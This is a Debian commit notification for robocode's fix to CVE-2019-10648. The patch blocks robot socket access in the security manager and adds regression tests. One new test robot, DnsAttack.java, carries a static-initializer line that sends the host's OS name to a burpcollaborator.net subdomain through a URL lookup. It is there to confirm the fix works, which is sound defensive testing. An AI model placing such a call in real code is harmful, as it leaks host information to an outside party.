[Git][java-team/robocode][master] 2 commits: Fix CVE-2019-10648
Markus Koschany
gitlab at salsa.debian.org
Sun Apr 7 23:22:32 BST 2019
Markus Koschany pushed to branch master at Debian Java Maintainers / robocode
Commits:
3a31c759 by Markus Koschany at 2019-04-07T22:11:50Z
Fix CVE-2019-10648
- - - - -
466142c3 by Markus Koschany at 2019-04-07T22:13:55Z
Update changelog
- - - - -
3 changed files:
- debian/changelog
- + debian/patches/CVE-2019-10648.patch
- debian/patches/series
Changes:
=====================================
debian/changelog
=====================================
@@ -1,3 +1,13 @@
+robocode (1.9.3.3-2) unstable; urgency=medium
+
+ * Fix CVE-2019-10648:
+ Robocode allows remote attackers to cause external service interaction
+ (DNS), as demonstrated by a query for a unique subdomain name within an
+ attacker-controlled DNS zone, because of a .openStream call within
+ java.net.URL. (Closes: #926088)
+
+ -- Markus Koschany <apo at debian.org> Mon, 08 Apr 2019 00:13:19 +0200
+
robocode (1.9.3.3-1) unstable; urgency=medium
* New upstream version 1.9.3.3.
=====================================
debian/patches/CVE-2019-10648.patch
=====================================
@@ -0,0 +1,235 @@
+From: Markus Koschany <apo at debian.org>
+Date: Mon, 8 Apr 2019 00:11:33 +0200
+Subject: CVE-2019-10648
+
+Bug-Debian: https://bugs.debian.org/926088
+Origin: https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd
+---
+ .../host/security/RobocodeSecurityManager.java | 26 ++++++++++--
+ .../src/main/java/tested/robots/DnsAttack.java | 18 +++++++++
+ .../test/robots/TestConstructorHttpAttack.java | 11 +++---
+ .../sf/robocode/test/robots/TestHttpAttack.java | 11 +++---
+ .../robots/TestStaticConstructorDnsAttack.java | 46 ++++++++++++++++++++++
+ 5 files changed, 96 insertions(+), 16 deletions(-)
+ create mode 100644 robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+ create mode 100644 robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+
+diff --git a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+index bc4c85a..ebd23e9 100644
+--- a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
++++ b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread;
+ import net.sf.robocode.host.IThreadManager;
+ import net.sf.robocode.io.RobocodeProperties;
+
++import java.net.SocketPermission;
+ import java.security.AccessControlException;
++import java.security.Permission;
+
+
+ /**
+@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager {
+ }
+
+ Thread c = Thread.currentThread();
+-
+ if (isSafeThread(c)) {
+ return;
+ }
+@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager {
+ if (robotProxy != null) {
+ robotProxy.punishSecurityViolation(message);
+ }
+- throw new AccessControlException(message);
++ throw new SecurityException(message);
+ }
+ }
+
+@@ -94,7 +95,6 @@ public class RobocodeSecurityManager extends SecurityManager {
+ return;
+ }
+ Thread c = Thread.currentThread();
+-
+ if (isSafeThread(c)) {
+ return;
+ }
+@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends SecurityManager {
+ String message = "Robots are only allowed to create up to 5 threads!";
+
+ robotProxy.punishSecurityViolation(message);
+- throw new AccessControlException(message);
++ throw new SecurityException(message);
+ }
+ }
++
++ public void checkPermission(Permission perm) {
++ if (RobocodeProperties.isSecurityOff()) {
++ return;
++ }
++ Thread c = Thread.currentThread();
++ if (isSafeThread(c)) {
++ return;
++ }
++ super.checkPermission(perm);
++
++ if (perm instanceof SocketPermission) {
++ IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c);
++ String message = "Using socket is not allowed";
++ robotProxy.punishSecurityViolation(message);
++ throw new SecurityException(message);
++ }
++ }
+
+ private boolean isSafeThread(Thread c) {
+ return threadManager.isSafeThread(c);
+diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+new file mode 100644
+index 0000000..701e5d8
+--- /dev/null
++++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+@@ -0,0 +1,18 @@
++package tested.robots;
++
++public class DnsAttack extends robocode.Robot {
++ static {
++ try {
++ new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".")
++ + ".randomsubdomain.burpcollaborator.net").openStream();
++ } catch (Exception e) {
++ }
++ }
++
++ public void run() {
++ for (;;) {
++ ahead(100);
++ back(100);
++ }
++ }
++}
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+index 8d7b1d7..7930237 100755
+--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent;
+ public class TestConstructorHttpAttack extends RobocodeTestBed {
+
+ private boolean messagedInitialization;
+- private boolean messagedAccessDenied;
++ private boolean securityExceptionOccurred;
+
+ @Override
+ public String getRobotNames() {
+@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends RobocodeTestBed {
+ messagedInitialization = true;
+ }
+
+- if (out.contains("access denied (java.net.SocketPermission")
+- || out.contains("access denied (\"java.net.SocketPermission\"")) {
+- messagedAccessDenied = true;
++ if (out.contains("java.lang.SecurityException:")) {
++ securityExceptionOccurred = true;
+ }
+ }
+
+ @Override
+ protected void runTeardown() {
+ Assert.assertTrue("Error during initialization", messagedInitialization);
+- Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+ }
+
+ @Override
+ protected int getExpectedErrors() {
+- return hasJavaNetURLPermission ? 3 : 2; // Security error must be reported as an error
++ return 2;
+ }
+ }
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+index 770fb49..06d3bcb 100755
+--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent;
+ */
+ public class TestHttpAttack extends RobocodeTestBed {
+
+- private boolean messagedAccessDenied;
++ private boolean securityExceptionOccurred;
+
+ @Override
+ public String getRobotNames() {
+@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed {
+
+ final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
+
+- if (out.contains("access denied (java.net.SocketPermission")
+- || out.contains("access denied (\"java.net.SocketPermission\"")) {
+- messagedAccessDenied = true;
++ if (out.contains("java.lang.SecurityException:")) {
++ securityExceptionOccurred = true;
+ }
+ }
+
+ @Override
+ protected void runTeardown() {
+- Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+ }
+
+ @Override
+ protected int getExpectedErrors() {
+- return hasJavaNetURLPermission ? 2 : 1; // Security error must be reported as an error. Java 8 reports two errors.
++ return 1;
+ }
+ }
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+new file mode 100644
+index 0000000..bf62373
+--- /dev/null
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+@@ -0,0 +1,46 @@
++/**
++ * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
++ * All rights reserved. This program and the accompanying materials
++ * are made available under the terms of the Eclipse Public License v1.0
++ * which accompanies this distribution, and is available at
++ * https://robocode.sourceforge.io/license/epl-v10.html
++ */
++package net.sf.robocode.test.robots;
++
++import net.sf.robocode.test.helpers.RobocodeTestBed;
++import org.junit.Assert;
++import robocode.control.events.TurnEndedEvent;
++
++/**
++ * @author Flemming N. Larsen (original)
++ */
++public class TestStaticConstructorDnsAttack extends RobocodeTestBed {
++
++ private boolean securityExceptionOccurred;
++
++ @Override
++ public String getRobotNames() {
++ return "tested.robots.DnsAttack,sample.Target";
++ }
++
++ @Override
++ public void onTurnEnded(TurnEndedEvent event) {
++ super.onTurnEnded(event);
++
++ final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
++
++ if (out.contains("SYSTEM: Using socket is not allowed")) {
++ securityExceptionOccurred = true;
++ }
++ }
++
++ @Override
++ protected void runTeardown() {
++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
++ }
++
++ @Override
++ protected int getExpectedErrors() {
++ return 1;
++ }
++}
=====================================
debian/patches/series
=====================================
@@ -1,3 +1,4 @@
showJavaDocumentation.patch
maven-assembly.patch
ecj.patch
+CVE-2019-10648.patch
View it on GitLab: https://salsa.debian.org/java-team/robocode/compare/16e74813bf2c450a60f6e6ae5a8838a65252bceb...466142c3297854c40fdad4bc3a5282ebbbf72b31
--
View it on GitLab: https://salsa.debian.org/java-team/robocode/compare/16e74813bf2c450a60f6e6ae5a8838a65252bceb...466142c3297854c40fdad4bc3a5282ebbbf72b31
You're receiving this email because of your account on salsa.debian.org.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://alioth-lists.debian.net/pipermail/pkg-java-commits/attachments/20190407/abda2ca8/attachment.html>
More information about the pkg-java-commits
mailing list